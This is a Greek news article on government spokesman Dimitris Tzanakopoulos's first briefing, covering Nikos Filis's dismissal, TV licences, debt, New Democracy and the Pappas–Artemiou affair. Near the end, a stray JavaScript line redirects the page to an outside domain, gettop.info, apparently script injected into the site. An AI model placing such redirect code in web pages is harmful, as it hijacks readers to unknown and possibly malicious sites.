Ο εκπρόσωπος του Τσίπρα έσφαξε με το βαμβάκι τον Φίλη (ΒΙΝΤΕΟ)

0
21

 

Στην πρώτη του ενημέρωση πολιτικών συντακτών ο νέος κυβερνητικός εκπρόσωπος Δημήτρης Τζανακόπουλος φάνηκε αγχωμένος άλλά δεν παρέλειψε να αποστείλει σαφή μηνύματα. Επιτέθηκε στη ΝΔ, μίλησε για τις τηλεοπτικές άδειες, για την απομάκρυνση του Νίκου Φίλη από την κυβέρνηση αλλά και το ταξίδι του Νίκου Παππά στη Βενεζουέλα με τον Αρτέμη Αρτεμίου.

Μιλώντας για τη διαπραγμάτευση ο κ. Τζανακόπουλος εκτίμησε πως θα ολοκληρωθεί στην ώρα της, ενώ για το ζήτημα του χρέους υπογράμμισε πως «δεν μπορεί να λυθεί σε μια μέρα, αλλά θα είναι μια διαρκής διαδικασία».

Σχετικά με την αδειοδότηση των τηλεοπτικών σταθμών, ο κ. Τζανακόπουλος υπογράμμισε την πρόθεση της κυβέρνησης να μην προχωρήσει σε υποχωρήσεις στον κεντρικό στόχο για αποκατάσταση της συνταγματικής τάξης. «Σε αυτή την κατεύθυνση κινείται η προσπάθειά μας για να μπει τάξη στο τηλεπτικό δελτίο με σεβασμο στη δικαιοσύνη και με διάθεση για συναινέσεις», σημείωσε. Ωστόσο, αρνήθηκε να αποκαλύψει το επόμενο κυβερνητικό βήμα σε περίπτωση μη συγκρότησης του ΕΣΡ.

Για την απομάκρυνση του Νίκου Φίλη και τη σύγκρουση με την εκκλησία είπε ότι «ο ανασχηματισμός δεν έχει μεταβάλει την κυβερνητική πολιτική. Ο πρωθυπουργός έχει το δικαίωμα και την υποχρέωση να αποφασίσει τα καταλληλότερα πρόσωπα για την εφαρμογή αυτής της πολιτικής» ενώ  «έσφαξε» με το βαμβάκι τον κ. Φίλη, υπογραμμίζοντας πως «εξάλλου το πότε και ποιος και με ποια στρατηγική θα ανοίξει μέτωπα και ρήξεις είναι προϊόν συλλογικής απόφασης».

Όπως συμπλήρωσε «ο πρωθυπουργός δεν είναι δάσκαλος και κανείς δεν είναι μαθητής. Ο πρωθυπουργός αποφασίζει με βάση την αποτελεσματικότερη εφαρμογή της κυβερνητικής πολιτικής», στην ουσία κατηγορώντας τον τέως υπουργό Παιδείας ότι δεν εφάρμοζε τις κυβερνητικές εντολές.

Επιπλέον, ο κ. Τζανακόπουλος επιτέθηκε στη ΝΔ, κατηγορώντας την ότι «το σχέδιό της είναι επικίνδυνο για τη χώρα. Ενδιαφέρεται μονάχα για την παλινόρθωση του συστήματος που στηρίζει. Επιδιώκει αποσταθεροποίηση ζητώντας συνεχώς εκλογές. Θέλει να βρει δικαιολογία για να εφαρμόσει σκληρό σύστημα περικοπών. Το πρόγραμμά της περιλαμβάνει απολύσεις, περικοπές, ξεπούλημα δημόσιας περιουσίας. Αυτό που θέλει η ΝΔ είναι να ανταλλάξει τη διάλυση της κοινωνίας με ελάφρυνση του χρέους».

«Η ρύθμιση του χρέους είναι εφικτή χωρίς κοινωνική συντριβή που θέλει ο κ. Μητσοτάκης. Ευτυχώς για τη χώρα η κυβέρνηση θα προχωρήσει σε υλοποίηση του σχεδίου με όρθια την κοινωνία. Το 2019 ο λαός θα έχει την ευκαιρία να συγκρίνει τα πεπραγμένα με την καταστροφική πενταετία 2009-2014», προσέθεσε ο κ. Τζανακόπουλος, επαναλαμβάνοντας έτσι την πάγια κυβερνητική θέση για εκλογές το 2019, ενώ σε άλλο σημείο τόνισε πως ο κυβερνητικός σχεδιασμός προχωρά και πως «η κυβέρνηση δεν χαράσσει στρατηγική και ούτε λαμβάνει αποφάσεις με βάση αυτές».

 

Σχολιάζοντας, επίσης, τις δηλώσεις του πρώην κεντρικού τραπεζίτη Γιώργου Προβόπουλου για το ενδεχόμενο τέταρτου Μνημονίου, τις απέρριψε και ανέφερε πως αυτό είναι το σχέδιο της ΝΔ.

Όσο για την υπόθεση Αρτεμίου – Παππά και το ταξίδι τους στη Βενεζουέλα, που αποκάλυψε ο Ελεύθερος Τύπος , ο κυβερνητικός εκπρόσωπος είπε ότι «η κυβέρνηση έχει απαντήσει επαρκώς στο ζήτημα» κάνοντας λόγο για μια «προσπάθεια εντυπώσεων για ένα ανύπαρκτο θέμα». «Αν η ΝΔ θέλει να ασχοληθεί με σκάνδαλα θα έπρεπε να ασχοληθεί με το σκάνδαλο της Siemens και όχι με τα υποτιθέμενα σκάνδαλα της κυβέρνησης. Να σημειώσω, τέλος, ότι ο κ. Παππάς δεν έχει δάνεια απλήρωτα στο όνομά του» κατέληξε για το θέμα αυτό.

Αναφερόμενος στην επίσκεψη Ομπάμα είπε ότι είναι σημάδι στήριξης για να βγει η Ελλάδα από την ατραπό της κρίσης, ενώ μιλώντας για την προσέλκυση επενδύσεων, υπογράμμισε πως απαιτείται σταθερότητα της οικονομίας, σταθερότητα των φορολογικών συντελεστών, αλλά και καταπολέμηση της άσκοπης γραφειοκρατίας που ταλανίζει την ελληνική διοίκηση.

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here